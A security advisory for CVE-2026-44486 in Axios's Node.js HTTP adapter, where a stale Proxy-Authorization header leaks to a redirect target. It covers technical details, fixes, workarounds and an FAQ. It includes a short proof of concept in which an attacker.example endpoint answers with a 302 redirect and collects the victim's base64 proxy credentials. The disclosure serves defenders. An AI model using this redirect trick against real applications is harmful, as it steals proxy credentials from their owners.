CVE-2026-44486: Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection
Summary
Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target.
This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.
Impact
An attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim’s proxy credentials.
The most relevant case is a Node.js application using an authenticated HTTPPROXY for an initial http:// request, with redirects enabled, where the redirect target resolves to no proxy, such as an https:// URL when HTTPSPROXY is unset.
This does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with maxRedirects: 0.
Affected Functionality
Affected functionality is limited to the Node.js HTTP adapter in lib/adapters/http.js.
Relevant inputs and settings include:
- HTTPPROXY, HTTPSPROXY, and NOPROXY. - Authenticated proxy URLs such as http://user:pass@proxy.example:8080. - Automatic redirect following through follow-redirects. - Axios proxy handling in setProxy(). - Redirect proxy handling through beforeRedirects.proxy.
Technical Details
In affected v1 releases, setProxy() adds Proxy-Authorization when a proxy with credentials is selected, but redirect handling calls setProxy() again without first clearing any existing proxy authorization header.
If the redirected URL resolves to no proxy, setProxy() does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale Proxy-Authorization header to the final origin.
The v1 fix in afca61a adds an isRedirect path that deletes any case variant of Proxy-Authorization before proxy settings are re-applied on redirect. The v0 backport in 2af6116 fixed the 0.x line for 0.32.0.
Proof of Concept of Attack
js process.env.HTTPPROXY = 'http://user:pass@127.0.0.1:8080'; delete process.env.HTTPSPROXY;
await axios.get('http://attacker.example/start');
Attacker-controlled HTTP endpoint:
http HTTP/1.1 302 Found Location: https://attacker.example/final
Expected result on affected versions:
text https://attacker.example/final receives: Proxy-Authorization: Basic dXNlcjpwYXNz
Expected result on fixed versions:
text https://attacker.example/final receives no Proxy-Authorization header
Workarounds
Set maxRedirects: 0 and handle redirects manually.
Avoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.
Ensure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.
<details> <summary>Original Source</summary>
Summary Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a Proxy-Authorization header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale Proxy-Authorization header is not cleared. As a result, the redirect target can receive the proxy credential directly.
This issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses HTTPPROXY with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when HTTPSPROXY is unset or the redirect target is excluded by NOPROXY.
Details In the current implementation:
- setProxy() adds Proxy-Authorization when a proxy with credentials is in use. - On redirects, Axios re-invokes setProxy() for the redirected request. - If the redirected URL re-evaluates to "no proxy", setProxy() does not clear the previously added Proxy-Authorization header. - The redirected request therefore reuses the stale header and sends it to the final origin.
Relevant code locations:
- lib/adapters/http.js - setProxy() adds Proxy-Authorization - redirect handling re-applies proxy logic through beforeRedirects.proxy - no cleanup is performed when the recomputed redirect request no longer uses a proxy
PoC 1. The victim sends GET http://<attacker-site>/start 2. The request goes through a local authenticated corp proxy 3. The attacker-controlled HTTP endpoint returns 302 Location: https://<attacker-site>/final 4. The redirected HTTPS request no longer uses a proxy 5. The attacker-controlled HTTPS endpoint receives the stale Proxy-Authorization header
Observed output:
text [corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz [attacker-http] GET /start [attacker-https] GET /final [attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz Leak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.
This demonstrates that the proxy credential is exposed to the redirect target origin.
Impact Exposes authenticated proxy credentials to an attacker-controlled origin. </details>
---
Other sources
Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/axiosto a version that resolves this vulnerability.Fixed in 0.32.0 - Upgrade
Upgrade
npm/axiosto a version that resolves this vulnerability.Fixed in 1.16.0 - Upgrade
Upgrade
axiosto a version that resolves this vulnerability.Fixed in 0.32.0Patch afca61a - Upgrade
Upgrade
axiosto a version that resolves this vulnerability.Fixed in 1.16.0Patch afca61a - Configuration
Set `maxRedirects: 0` for requests to untrusted origins and handle redirects manually to avoid the redirect path that can leak `Proxy-Authorization`.
Axios (Node.js HTTP adapter) maxRedirects = 0 - Configuration
Avoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled, and ensure `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` are configured consistently across protocols so redirects do not change from proxied to direct connections.
Runtime environment (HTTP_PROXY/HTTPS_PROXY/NO_PROXY) HTTP_PROXY / HTTPS_PROXY / NO_PROXY configuration consistency across protocols = configure so redirects do not unexpectedly change from proxied to direct connections - Compensating control
Avoid sending requests to untrusted origins when using an authenticated proxy with redirects enabled unless redirect behaviour is controlled (attacker can redirect to an attacker-controlled target that receives stale `Proxy-Authorization`).
Event History
Frequently Asked Questions
What is the severity of CVE-2026-44486?
The severity of CVE-2026-44486 is rated high with a score of 7.5.
What does CVE-2026-44486 affect?
CVE-2026-44486 affects Axios’ Node.js HTTP adapter when handling requests through authenticated proxies.
What type of vulnerability is CVE-2026-44486 classified as?
CVE-2026-44486 is classified as an info leak vulnerability.
How can I mitigate the risk of CVE-2026-44486?
To mitigate CVE-2026-44486, you should avoid using affected versions of Axios that perform redirects through authenticated proxies.
What happens if I do not fix CVE-2026-44486?
If CVE-2026-44486 is not addressed, there is a risk of leaking proxy credentials to unauthorized redirect targets.